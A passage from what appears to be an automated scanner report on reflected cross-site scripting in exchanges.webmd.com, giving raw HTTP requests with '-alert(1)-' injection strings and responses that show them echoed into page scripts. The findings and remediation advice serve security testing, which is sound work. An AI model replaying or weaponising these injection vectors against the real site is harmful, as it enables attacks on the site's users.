Path:   /webmd-exchanges/blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload babf0'-alert(1)-'d9622103594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogs?babf0'-alert(1)-'d9622103594=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98996
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=1680&sec=&au1=&au2=&uri=%2fwebmd-exchanges%2fblogs%3fbabf0'-alert(1)-'d9622103594%3d1&artid=091e9c5e80470c99&inst=0&amp;leaf=">
...[SNIP]...

1.13. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a331"-alert(1)-"ec097290236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogs?9a331"-alert(1)-"ec097290236=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 99013
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:46 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/blogs?9a331"-alert(1)-"ec097290236=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.14. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edca8'-alert(1)-'34d3c48ff25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesedca8'-alert(1)-'34d3c48ff25/cancer-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59527
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:03 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesedca8'-alert(1)-'34d3c48ff25%252fcancer-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.15. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0815'-alert(1)-'d1f50966244 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchangesd0815'-alert(1)-'d1f50966244 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59527
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:12 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fcancer-exchangesd0815'-alert(1)-'d1f50966244&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.16. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cd64'-alert(1)-'13537b384aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchanges?1cd64'-alert(1)-'13537b384aa=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69751
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fcancer-exchanges%3f1cd64'-alert(1)-'13537b384aa%3d1&artid=091e9c5e805cc69f&inst=0&amp;leaf=">
...[SNIP]...

1.17. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937f8"-alert(1)-"68857cebe14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchanges?937f8"-alert(1)-"68857cebe14=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69765
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/cancer-exchanges?937f8"-alert(1)-"68857cebe14=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.18. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6ad'-alert(1)-'88b4e879c5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges9e6ad'-alert(1)-'88b4e879c5e/digestive-disorders-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59566
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:36 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges9e6ad'-alert(1)-'88b4e879c5e%252fdigestive-disorders-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.19. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e79'-alert(1)-'3756566e454 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchangesb5e79'-alert(1)-'3756566e454 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59566
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:47 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fdigestive-disorders-exchangesb5e79'-alert(1)-'3756566e454&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.20. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19bcd"-alert(1)-"af5789461db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchanges?19bcd"-alert(1)-"af5789461db=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67123
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/digestive-disorders-exchanges?19bcd"-alert(1)-"af5789461db=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.21. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 559a7'-alert(1)-'0f02beb19c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchanges?559a7'-alert(1)-'0f02beb19c1=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67107
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
onID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fdigestive-disorders-exchanges%3f559a7'-alert(1)-'0f02beb19c1%3d1&artid=091e9c5e805cc6d1&inst=0&amp;leaf=">
...[SNIP]...

1.22. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a683'-alert(1)-'734a36af06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges3a683'-alert(1)-'734a36af06/eating-diet-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59539
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges3a683'-alert(1)-'734a36af06%252feating-diet-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.23. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21ab4'-alert(1)-'ae4a99fd1be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges21ab4'-alert(1)-'ae4a99fd1be HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:33 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252feating-diet-exchanges21ab4'-alert(1)-'ae4a99fd1be&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.24. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c77"-alert(1)-"04761d393fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges?24c77"-alert(1)-"04761d393fc=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70275
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/eating-diet-exchanges?24c77"-alert(1)-"04761d393fc=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.25. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3526'-alert(1)-'92250c2ea7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges?a3526'-alert(1)-'92250c2ea7d=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70259
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2feating-diet-exchanges%3fa3526'-alert(1)-'92250c2ea7d%3d1&artid=091e9c5e805cbe42&inst=0&amp;leaf=">
...[SNIP]...

1.26. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ade90'-alert(1)-'2e050d781bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesade90'-alert(1)-'2e050d781bd/health-experts HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59521
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesade90'-alert(1)-'2e050d781bd%252fhealth-experts&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.27. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
